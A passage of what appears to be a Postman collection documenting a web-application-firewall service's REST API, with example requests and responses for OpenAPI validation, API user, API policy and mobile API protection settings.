Protection","id":"e1bf7c44-11e0-420b-90d4-6ae70524f32f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"description":"<p>Endpoint ID</p>\n","key":"Accept","value":"application/json"},{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/apiprotection","description":"<p>Get the information about OpenAPI validation policy.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","apiprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4eb56c89-02ce-4ad2-8568-515dc9ca94ea","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json","description":"Endpoint ID"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/APIProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","APIProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 15 May 2019 07:35:22 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"ff5e61b5-76e3-11e9-9522-81dfc78f0fb9"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"ZtshJFw-oAMFf6A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"e959d013-2874-436b-9c5c-0baafb191ecc","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/APIProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","APIProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 03:31:44 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"312"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"f4f109d7-7b78-11e9-ab08-e9dbadd67526"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aA6dHG9DIAMFVsw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce37120-ee38755267109808e22ed37f;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert\",\n        \"template_status\": \"disable\",\n        \"OpenAPIValidationPolicy\": {\n            \"schema-file\": [\n                {\n                    \"openapi-file\": \"test.yaml\",\n                    \"title\": \"Swagger Petstore\",\n                    \"description\": \"test data_type\",\n                    \"request_url\": \"http://10.0.11.110:8090,http://10.61.0.24,http://10.62.0.22\",\n                    \"seq\": \"1\"\n                }\n            ]\n        }\n    }\n}"}],"_postman_id":"e1bf7c44-11e0-420b-90d4-6ae70524f32f"},{"name":"Update API Protection","id":"bc63f00f-2af8-4e07-920f-7637811fca9d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"OpenAPIValidationPolicy","value":"{\"schema-file\": [{\"seq\":1,\"openapi-file\":\"test.yaml\"}]}","type":"text"},{"key":"file_1","value":"C:\\WAF\\API files\\123.yaml","description":"<p>This is the .yaml file to upload.</p>\n","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/apiprotection","description":"\n\n\n<p>Update the information about the OpenAPI validation policy.</p>\n<p>The data format in the request is <code>multipart/form-data</code>. </p>\n<p>The keys of the form are <code>_status, template_status, OpenAPIValidationPolicy, action.</code></p>\n<p>The keyword format of the uploaded file is: the prefix file+the sequence value of each rule, for example, file_2.</p>\n<p>The field _status value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"enable\", \"disable\"],\n    \"default\": \"disable\"\n\n</code></pre>\n<p></p>\n<p>The field action value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"alert\", \"alert_deny\", \"deny_no_log\"],\n    \"default\": \"alert_deny\"\n\n</code></pre>\n<p></p>\n<p>The field template_status value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"enable\", \"disable\"],\n    \"default\": \"disable\"\n\n</code></pre>\n<p></p>\n<p>The field OpenAPIValidationPolicy value shall conform to the following JSON schema::\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\"> \n    \"type\": \"object\",\n    \"required\": [\"schema-file\"],\n    \"properties\": {\n        \"schema-file\": {\n            \"description\": \"The table list of schema file\",\n            \"type\": \"array\",\n            \"maxItems\": 10,\n            \"uniqueItems\": true,\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"seq\"],\n                \"properties\": {\n                    \"seq\": {\n                        \"description\": \"The sequence number of the API protection rule\",\n                        \"type\": \"integer\"\n                    },\n                    \"openapi-file\": {\n                        \"description\": \"The uploaded OpenAPI file\",\n                        \"type\": \"string\"\n                    }\n                }\n            }\n        }\n    }\n</code></pre>\n<p></p>\n<p>After you update the configuration, the API will return successfully.</p>\n\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","apiprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"19c9bfca-3bcb-4846-bdfd-61dd4206b358","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Endpoint ID","key":"Accept","value":"application/json"},{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"OpenAPIValidationPolicy","value":"{\"schema-file\": [{\"seq\":1,\"openapi-file\":\"test.yaml\"}]}","type":"text"},{"key":"file_1","value":"C:\\WAF\\API files\\123.yaml","description":" This is the .yaml file to upload.","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/APIProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","APIProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 08:29:28 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"e2686c88-787d-11e9-9635-4712d0c8a3d1"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z0aUMF7YoAMFmVw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cde70e7-ffe424d374ce0c2ffba67e5c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"7b7add8f-872a-4554-86c3-942390230fbe","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"description":"Endpoint ID","key":"Accept","value":"application/json"},{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"OpenAPIValidationPolicy","value":"{\"schema-file\": [{\"seq\":1,\"openapi-file\":\"uspto1M.yaml\"}]}","type":"text"},{"key":"file_1","value":"C:\\WAF\\API files\\123.yaml","description":"This is the .yaml file to upload.","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/APIProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","APIProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 08:24:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"95"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2da713e9-787d-11e9-84df-f35b0dd116b4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z0ZkzGUaIAMF1UA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cde6fb8-289e5ffc3957194a5203c832;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'openapi-file': 'The file uspto1M.yaml of rule 1 does not exist!'}\"\n}"},{"id":"bb2f929e-8d10-414d-9c9e-ad406d9afe49","name":"Fail","originalRequest":{"method":"PUT","header":[{"description":"Endpoint ID","key":"Accept","value":"application/json"},{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"OpenAPIValidationPolicy","value":"{\"schema-file\": [{\"seq\":1,\"openapi-file\":\"test.yaml\"}]}","type":"text"},{"key":"file_1","value":"C:\\WAF\\API files\\123.yaml","description":"This is the .yaml file to upload.","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/APIProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","APIProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 May 2019 09:11:37 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"c61981c7-7883-11e9-8322-71859939219f"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z0gfbFkMoAMFRTQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"bc63f00f-2af8-4e07-920f-7637811fca9d"},{"name":"Get API User","id":"6e04aca2-01e0-49a9-b14a-5648bc99b0b5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/apiuser","description":"<p>Get the configuration information of API User.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","apiuser"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2d3a0b27-45f0-47cd-8978-3c52a9937823","name":"Succcess","originalRequest":{"method":"GET","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apiuser","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apiuser"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:43:54 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"76"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"eadaa11b-933f-11e9-a972-1fdfcf3d15ff"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpGHHREoAMFQUQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b555a-e8701e13aa9b1e6c2060b3f4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"template_status\": \"disable\",\n        \"apiuser\": [{\n            \"name\": \"user1\",\n            \"email\": \"user1@xx.com\",\n            \"comments\": \"user1\",\n            \"ip-access-list\": [\"1.1.1.1\"],\n            \"http-referer-list\": [\"www.sina.com\"],\n            \"uuid\": \"dc0ed1a8-4730-11ea-a96c-bec6b02944a5\",\n            \"api-key\": \"DsNVUtdULmBPrRR5TNEZn1o6Byj6Zx4H7HPajmht\",\n            \"create-time\": \"2020-02-04 09:29:36\"\n        }]\n    }\n}"},{"id":"c9135523-d88c-4157-9eb5-a03a70d52d48","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"authorization","value":"","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apiuser","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apiuser"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:44:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"00bac1c3-9340-11e9-a71e-7bb947d6e9fb"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bkpL2HcroAMF8Ww="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"6e04aca2-01e0-49a9-b14a-5648bc99b0b5"},{"name":"Update API User","id":"2ccab337-e808-435c-aa67-65d6a4c0b30d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"[{\n    \"name\": \"user1\",\n    \"email\": \"user1@xx.com\",\n    \"comments\": \"user1\",\n    \"ip-access-list\": [\"1.1.1.1\"],\n    \"http-referer-list\": [\"www.sina.com\"]\n}]"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/apiuser","description":"<p>Update the information about API user.\nA sample body is added to the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"name\": \"user1\",\n    \"email\": \"user1@xx.com\",\n    \"comments\": \"user1\",\n    \"ip-access-list\": [\"1.1.1.1\"],\n    \"http-referer-list\": [\"www.sina.com\"]\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","apiuser"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"56c5c23c-835c-4be3-acae-d27f2f5cae60","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"[{\n    \"name\": \"user1\",\n    \"email\": \"user1@xx.com\",\n    \"comments\": \"user1\",\n    \"ip-access-list\": [\"1.1.1.1\"],\n    \"http-referer-list\": [\"www.sina.com\"]\n}]"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apiuser","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apiuser"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:45:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2dfa9ef0-9340-11e9-800b-7784b92e5419"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpXuEpBoAMF5uQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55cb-4501fc0c64d230e81ce23f41;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"bc7b78d7-ba42-4ae5-850b-e698278534c8","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"[{\n    \"name\": \"user1\",\n    \"email\": \"user1@xx.com\",\n    \"comments\": \"user1\",\n    \"http-referer-list\": [\"www.sina.com\"]\n}]"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apiuser","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apiuser"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:46:06 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"50"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"399affb7-9340-11e9-b8d2-9fca7b4f4748"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpaxEDToAMF2WQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55de-23d385f47a226760769d5898;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"ip-access-list not valid!\"\n}"}],"_postman_id":"2ccab337-e808-435c-aa67-65d6a4c0b30d"},{"name":"Get API Policy","id":"bdf42e35-e1b1-4837-9a61-2a7065535de3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/apipolicy","description":"<p>Get the configuration information of API policy.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","apipolicy"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"0c1c7e13-d357-4d5c-ad37-552a1bd392a8","name":"Success","originalRequest":{"method":"GET","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apipolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apipolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:43:54 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"76"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"eadaa11b-933f-11e9-a972-1fdfcf3d15ff"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpGHHREoAMFQUQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b555a-e8701e13aa9b1e6c2060b3f4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"template_status\": \"disable\",\n        \"action\": \"alert\",\n        \"apipolicy\": [{\n            \"api-key-verification\": \"enable\",\n            \"rate-limit-period\": 1,\n            \"name\": \"rule1\",\n            \"rate-limit-requests\": 60,\n            \"match-url-prefixes\": [{\n                \"frontend-prefix\": \"/front_prefix\",\n                \"name\": 1,\n                \"backend-prefix\": \"/back_prefix\"\n            }],\n            \"api-key-location\": \"http-header\",\n            \"header-field-name\": \"header1\",\n            \"api-user-list\": [\"user1\"]\n        }]\n    }\n}"},{"id":"9f6acf53-9648-4395-9d5a-2139da0a0a28","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"authorization","value":"","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apipolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apipolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:44:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"00bac1c3-9340-11e9-a71e-7bb947d6e9fb"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bkpL2HcroAMF8Ww="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"bdf42e35-e1b1-4837-9a61-2a7065535de3"},{"name":"Update API Policy","id":"200dd8de-8e66-4090-86f6-97c7d7727bca","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"template_status\": \"disable\",\n    \"action\": \"alert\",\n    \"apipolicy\": [{\n        \"api-key-verification\": \"enable\",\n        \"api-key-location\": \"http-header\",\n        \"match-url-prefixes\": [{\n            \"frontend-prefix\": \"/front_prefix\",\n            \"backend-prefix\": \"/back_prefix\"\n        }],\n        \"api-user-list\": [\"he\"],\n        \"rate-limit-period\": 1,\n        \"rate-limit-requests\": 60,\n        \"name\": \"rule1\",\n        \"header-field-name\": \"header1\"\n    }]\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/apipolicy","description":"<p>Update the information about the API Policy.\nA sample body is added to the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"_status\": \"enable\",\n    \"template_status\": \"disable\",\n    \"action\": \"alert\",\n    \"apipolicy\": [{\n        \"api-key-verification\": \"enable\",\n        \"api-key-location\": \"http-header\",\n        \"match-url-prefixes\": [{\n            \"frontend-prefix\": \"/front_prefix\",\n            \"backend-prefix\": \"/back_prefix\"\n        }],\n        \"api-user-list\": [\"he\"],\n        \"rate-limit-period\": 1,\n        \"rate-limit-requests\": 60,\n        \"name\": \"rule1\",\n        \"header-field-name\": \"header1\"\n    }]\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","apipolicy"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"549bbc38-2114-4266-b3b0-28f0b2c39329","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"template_status\": \"disable\",\n    \"action\": \"alert\",\n    \"apipolicy\": [{\n        \"api-key-verification\": \"enable\",\n        \"api-key-location\": \"http-header\",\n        \"match-url-prefixes\": [{\n            \"frontend-prefix\": \"/front_prefix\",\n            \"backend-prefix\": \"/back_prefix\"\n        }],\n        \"api-user-list\": [\"he\"],\n        \"rate-limit-period\": 1,\n        \"rate-limit-requests\": 60,\n        \"name\": \"rule1\",\n        \"header-field-name\": \"header1\"\n    }]\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apipolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apipolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:45:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2dfa9ef0-9340-11e9-800b-7784b92e5419"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpXuEpBoAMF5uQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55cb-4501fc0c64d230e81ce23f41;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"8dfb9497-6078-437f-8c1f-8c369d20cb02","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"template_status\": \"disable\",\n    \"action\": \"alert\",\n    \"apipolicy\": [{\n        \"api-key-verification\": \"enable\",\n        \"api-key-location\": \"http-header\",\n        \"match-url-prefixes\": [{\n            \"frontend-prefix\": \"/front_prefix\",\n            \"backend-prefix\": \"/back_prefix\"\n        }],\n        \"api-user-list\": [\"nobody\"],\n        \"rate-limit-period\": 1,\n        \"rate-limit-requests\": 60,\n        \"name\": \"rule1\",\n        \"header-field-name\": \"header1\"\n    }]\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/apipolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","apipolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:46:06 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"50"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"399affb7-9340-11e9-b8d2-9fca7b4f4748"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkpaxEDToAMF2WQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b55de-23d385f47a226760769d5898;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"api-user-list not valid!\"\n}"}],"_postman_id":"200dd8de-8e66-4090-86f6-97c7d7727bca"},{"name":"Get Mobile API Protection","id":"52112ecf-9259-41ae-a518-4b273965b1a4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/mobileapiprotection","description":"<p>Get the configuration information of mobile API protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","mobileapiprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"9f550dce-f57a-4bd1-83ca-eb0c3a3c3d81","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mobileapiprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mobileapiprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"token-header\": \"Jwt_Token\",\n        \"url-list\": [\n            {\n                \"url-pattern\": 